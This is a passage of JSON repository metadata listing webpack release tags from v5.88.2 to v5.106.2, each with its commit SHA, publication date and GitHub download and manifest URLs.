webpack/webpack/tar.gz/v5.106.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.2/manifests"},{"name":"v5.106.1","sha":"a934b9bb0330aba61e759ef943b7303ba305959f","kind":"tag","published_at":"2026-04-10T10:42:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.1/manifests"},{"name":"v5.106.0","sha":"8774a0110bea46f33fd2c504f59e698dbdcf136e","kind":"tag","published_at":"2026-04-08T15:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.106.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.106.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.106.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.106.0/manifests"},{"name":"v5.105.4","sha":"27c13b44c861908793f160f9f7413b32543c0522","kind":"tag","published_at":"2026-03-03T16:29:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.4/manifests"},{"name":"v5.105.3","sha":"714a0e3496f2189f76b5d2c98eacdeedae9e7c06","kind":"tag","published_at":"2026-02-26T10:27:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.3/manifests"},{"name":"v5.105.2","sha":"0756c7eb697a7759afe081a1fcf8f5481ea06bc3","kind":"tag","published_at":"2026-02-12T15:19:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.2/manifests"},{"name":"v5.105.1","sha":"8e50ef2035b9cb727aeaa97d7561545d1c102b91","kind":"tag","published_at":"2026-02-10T15:01:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.1/manifests"},{"name":"v5.105.0","sha":"1486f9aacca11d79dbb7ddbceed29b7e6df7a7ab","kind":"tag","published_at":"2026-02-03T15:30:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.105.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.105.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.105.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.105.0/manifests"},{"name":"v5.104.1","sha":"24e3c2d2c9f8c6d60810302b2ea70ed86e2863dc","kind":"commit","published_at":"2025-12-18T12:34:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.1/manifests"},{"name":"v5.104.0","sha":"505a5e744fbcf4471ddb534bf1d4aebea9643c1b","kind":"commit","published_at":"2025-12-16T13:03:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.104.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.104.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.104.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.104.0/manifests"},{"name":"v5.103.0","sha":"e0219482aafb9087a50ca0be45110727a33801fb","kind":"commit","published_at":"2025-11-18T11:07:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.103.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.103.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.103.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.103.0/manifests"},{"name":"v5.102.1","sha":"c7ebdbda637ea73a03a23446f5db0f600e304772","kind":"commit","published_at":"2025-10-07T16:26:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.1/manifests"},{"name":"v5.102.0","sha":"14c813a0b3709e142b3ed03355c6c15fc11b91a1","kind":"commit","published_at":"2025-09-29T18:24:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.102.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.102.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.102.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.102.0/manifests"},{"name":"v5.101.3","sha":"07b1ac0213bcf9591a8dd5633535a43ecd248192","kind":"commit","published_at":"2025-08-18T12:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.3/manifests"},{"name":"v5.101.2","sha":"1d9cc240a29d17f3986d9e9f96f2589d823e832c","kind":"commit","published_at":"2025-08-14T15:56:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.2/manifests"},{"name":"v5.101.1","sha":"4a0aa5d204dd0cfbaecd99f87be97deac5a883ff","kind":"commit","published_at":"2025-08-12T11:44:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.1/manifests"},{"name":"v5.101.0","sha":"5b87bedaf418b3cfa713d520bb70191098943917","kind":"commit","published_at":"2025-07-28T13:43:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.101.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.101.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.101.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.101.0/manifests"},{"name":"v5.100.2","sha":"21fcdbb8f2bb3820d3309df8e399c6deced12b42","kind":"commit","published_at":"2025-07-15T13:35:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.2/manifests"},{"name":"v5.100.1","sha":"ad1e3b46f46b9acd5bb9c377afcdc101338d5c96","kind":"commit","published_at":"2025-07-11T11:16:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.1/manifests"},{"name":"v5.100.0","sha":"83c534ca3a6385ee7037220c7ba510ba5a8d944c","kind":"commit","published_at":"2025-07-09T11:10:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.100.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.100.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.100.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.100.0/manifests"},{"name":"v5.99.9","sha":"6c9f912af2dfbb3e0e1a2a3ecdc3881c96363432","kind":"commit","published_at":"2025-05-20T11:50:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.9","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.9/manifests"},{"name":"v5.99.8","sha":"a9cbd85abf476fe8aba0cb1037f7e630f5f8649f","kind":"commit","published_at":"2025-05-06T13:04:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.8","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.8/manifests"},{"name":"v5.99.7","sha":"ad77deb6ed0b9540f9d2cf1a1c08f9d058a95da6","kind":"commit","published_at":"2025-04-25T10:47:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.7","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.7/manifests"},{"name":"v5.99.6","sha":"f8eee102c20a3d79eddfed0194113c4d5759d9e4","kind":"commit","published_at":"2025-04-18T12:05:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.6","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.6/manifests"},{"name":"v5.99.5","sha":"70e3d9d5dbd3548431b8878dead4647beff5c14f","kind":"commit","published_at":"2025-04-08T22:43:57.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.5","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.5/manifests"},{"name":"v5.99.4","sha":"04e00736b03eee0fabfd32eee5323ddc3701083f","kind":"commit","published_at":"2025-04-08T20:09:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.4","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.4/manifests"},{"name":"v5.99.3","sha":"2470d8e74c8b647203063826cae1ea5e691726a9","kind":"commit","published_at":"2025-04-08T14:49:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.3/manifests"},{"name":"v5.99.2","sha":"44da94f433c4adeb7ac56abc69df2b0f8a213486","kind":"commit","published_at":"2025-04-08T07:17:41.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.2/manifests"},{"name":"v5.99.1","sha":"2b2b705cc5c53594adf5adebca55f7273a1615c9","kind":"commit","published_at":"2025-04-07T22:34:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.1/manifests"},{"name":"v5.99.0","sha":"1bd06e333346656ef6542e36478f02055cab7369","kind":"commit","published_at":"2025-04-07T13:11:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.99.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.99.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.99.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.99.0/manifests"},{"name":"v5.98.0","sha":"f1bdec5cc70236083e45b665831d5d79d6485db7","kind":"tag","published_at":"2025-02-12T20:10:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.98.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.98.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.98.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.98.0/manifests"},{"name":"v5.97.1","sha":"3612d36e44bda5644dc3b353e2cade7fe442ba59","kind":"commit","published_at":"2024-12-05T14:17:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.1/manifests"},{"name":"v5.97.0","sha":"644f1d12716ba8f3c96d2efa279262560dd8c7fb","kind":"commit","published_at":"2024-12-03T11:06:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.97.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.97.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.97.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.97.0/manifests"},{"name":"v5.96.1","sha":"d4ced7322229c7d72a7a0d2ca955bdde0c910a0b","kind":"commit","published_at":"2024-11-01T10:59:24.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.1/manifests"},{"name":"v5.96.0","sha":"aff0c3ed2b31ed16ce8738e02f4b8f97966833f4","kind":"commit","published_at":"2024-10-31T22:01:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.96.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.96.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.96.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.96.0/manifests"},{"name":"v5.95.0","sha":"e20fd634fd24fab2c821a6e6114ace706ca052d0","kind":"commit","published_at":"2024-09-25T14:13:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.95.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.95.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.95.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.95.0/manifests"},{"name":"v5.94.0","sha":"eabf85d8580dfcb876b56957ba5488222a4f7873","kind":"commit","published_at":"2024-08-22T13:02:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.94.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.94.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.94.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.94.0/manifests"},{"name":"v5.93.0","sha":"277460b33bcc49c51acbbcd688672aa4ec685732","kind":"commit","published_at":"2024-07-11T18:28:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.93.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.93.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.93.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.93.0/manifests"},{"name":"v5.92.1","sha":"a82e0cd00e26d8452295f0d680417e4656a6d7cc","kind":"commit","published_at":"2024-06-19T16:19:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.1/manifests"},{"name":"v5.92.0","sha":"34e2561addb0f65a7a6fb0ce7ae1aea4cd1d599f","kind":"commit","published_at":"2024-06-11T14:50:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.92.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.92.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.92.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.92.0/manifests"},{"name":"v5.91.0","sha":"60daca54105f89eee45e118fd0bbc820730724ee","kind":"commit","published_at":"2024-03-20T16:11:48.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.91.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.91.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.91.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.91.0/manifests"},{"name":"v5.90.3","sha":"651b3d66d10d54da31d4cb7123ea74d10f1f5456","kind":"commit","published_at":"2024-02-19T12:32:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.3","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.3/manifests"},{"name":"v5.90.2","sha":"11c1be3d0838e8de31900aacabcd449e9da77eaf","kind":"commit","published_at":"2024-02-15T14:24:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.2/manifests"},{"name":"v5.90.1","sha":"08770761c8c7aa1e6e18b77d3deee8cc9871bd87","kind":"commit","published_at":"2024-02-01T17:09:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.1","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.1/manifests"},{"name":"v5.90.0","sha":"4a2662381ed8e6a9d849b494511459f5858d4e82","kind":"commit","published_at":"2024-01-24T13:09:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.90.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.90.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.90.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.90.0/manifests"},{"name":"v5.89.0","sha":"87660921808566ef3b8796f8df61bd79fc026108","kind":"tag","published_at":"2023-10-13T22:27:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.89.0","html_url":"https://github.com/webpack/webpack/releases/tag/v5.89.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.89.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v5.89.0/manifests"},{"name":"v4.47.0","sha":"dfffd6a241bf1d593b3fd31b4b279f96f4a4aab1","kind":"tag","published_at":"2023-09-06T17:15:50.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v4.47.0","html_url":"https://github.com/webpack/webpack/releases/tag/v4.47.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v4.47.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v4.47.0/manifests"},{"name":"v5.88.2","sha":"1f99ad6367f2b8a6ef17cce0e058f7a67fb7db18","kind":"tag","published_at":"2023-07-12T18:15:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v5.88.2","html_url":"https://github.com/webpack/webpack/releases/tag/v5.88.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v5.88.2","tag_url":"https://repos.ecosy